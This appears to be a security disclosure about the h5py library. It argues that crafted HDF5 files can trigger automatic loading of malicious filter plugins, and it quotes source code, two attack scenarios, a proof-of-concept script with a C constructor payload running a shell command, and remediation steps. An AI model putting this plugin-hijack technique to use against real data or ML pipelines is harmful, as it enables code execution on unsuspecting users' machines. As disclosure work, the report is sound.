h5py-filter-plugin-rce-poc / h5py-01-filter-plugin-code-execution.md

Upload h5py-01-filter-plugin-code-execution.md with huggingface_hub

6f3a7c5 verified 12 days ago

6.45 kB

	# Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py

	## Target
	- Project: h5py/h5py
	- URL: https://github.com/h5py/h5py
	- Component: HDF5 filter pipeline / dataset read path
	- CWE: CWE-94 (Improper Control of Generation of Code / Code Injection)

	## Severity: HIGH

	## Summary

	When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (`.so`/`.dll`) filter plugin from directories in the plugin search path. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does nothing to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs.

	## Vulnerable Code

	### File: `h5py/h5py/h5z.pyx` (lines 102-121)

	```python
	@with_phil
	def register_filter(uintptr_t cls_pointer_address):
	'''(INT cls_pointer_address) => BOOL

	Register a new filter from the memory address of a buffer containing a
	``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.

	`cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
	library::

	import ctypes

	filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
	filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p

	h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())

	'''
	return <int>H5Zregister(<const void *>cls_pointer_address) >= 0
	```

	### File: `h5py/h5py/h5pl.pyx` (lines 20-25)

	```python
	cpdef append(const char* search_path):
	"""(STRING search_path)
	Add a directory to the end of the plugin search path.
	"""
	H5PLappend(search_path)
	```

	### File: `h5py/h5py/_hl/filters.py` (lines 295-299)

	When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:
	```python
	elif isinstance(compression, int):
	if not allow_unknown_filter and not h5z.filter_avail(compression):
	raise ValueError("Unknown compression filter number: %s" % compression)
	plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
	```

	### Automatic Plugin Loading (HDF5 library behavior)

	When `H5Dread()` is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads them via `dlopen()`, calls `H5PLget_plugin_info()` to obtain the filter class, and registers it automatically. This happens transparently inside:

	- `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)`
	- `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)`

	## Exploitation

	### Attack Scenario 1: Crafted HDF5 file + environment manipulation

	1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration)
	2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol
	3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
	4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes

	### Attack Scenario 2: h5pl API abuse in shared environments

	In applications where users can influence the plugin path via `h5py.h5pl.append()` before file loading:

	```python
	import h5py

	# Attacker injects malicious plugin path
	h5py.h5pl.append(b'/attacker/controlled/path')

	# Later, when legitimate code reads a crafted HDF5 file:
	with h5py.File('crafted.h5', 'r') as f:
	data = f['dataset'][:] # Triggers plugin loading -> RCE
	```

	### Proof of Concept

	```python
	import h5py
	import numpy as np
	import struct
	import tempfile
	import os

	# Step 1: Create a malicious shared library (filter plugin)
	# In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code
	# For demonstration, this would be:
	# gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
	# Where malicious_filter.c contains:
	# #include <stdlib.h>
	# void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }

	# Step 2: Set plugin path
	os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'

	# Step 3: Create HDF5 file with custom filter
	CUSTOM_FILTER_ID = 32000 # Use a non-standard filter ID

	with h5py.File('/tmp/crafted.h5', 'w') as f:
	# Use allow_unknown_filter to bypass availability check during creation
	f.create_dataset(
	'payload',
	data=np.zeros(100),
	compression=CUSTOM_FILTER_ID,
	compression_opts=(0,),
	chunks=(100,),
	allow_unknown_filter=True
	)

	# Step 4: When any user reads this file, the filter plugin is loaded
	with h5py.File('/tmp/crafted.h5', 'r') as f:
	data = f['payload'][:] # This triggers automatic plugin search and dlopen()
	```

	## Impact

	- Arbitrary code execution in the context of the process reading the HDF5 file
	- This is particularly dangerous in:
	- Data science pipelines that process untrusted HDF5 files
	- ML model loading (Keras/TensorFlow models are stored as HDF5)
	- Scientific data sharing workflows
	- Jupyter notebook environments processing external data
	- h5py provides no mechanism to disable automatic filter plugin loading
	- The `allow_unknown_filter=True` parameter on dataset creation is designed for this workflow, explicitly supporting the use case

	## Remediation

	1. Provide an option to disable automatic filter plugin loading when opening files for reading. HDF5 1.10+ supports `H5PLset_loading_state()` to disable plugin loading.
	2. Add a security warning in documentation about the risks of processing untrusted HDF5 files
	3. Consider defaulting to disabled plugin loading for read-only file access, requiring explicit opt-in
	4. Validate or restrict plugin paths added via `h5pl.append()`/`prepend()`

	## References

	- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
	- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
	- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline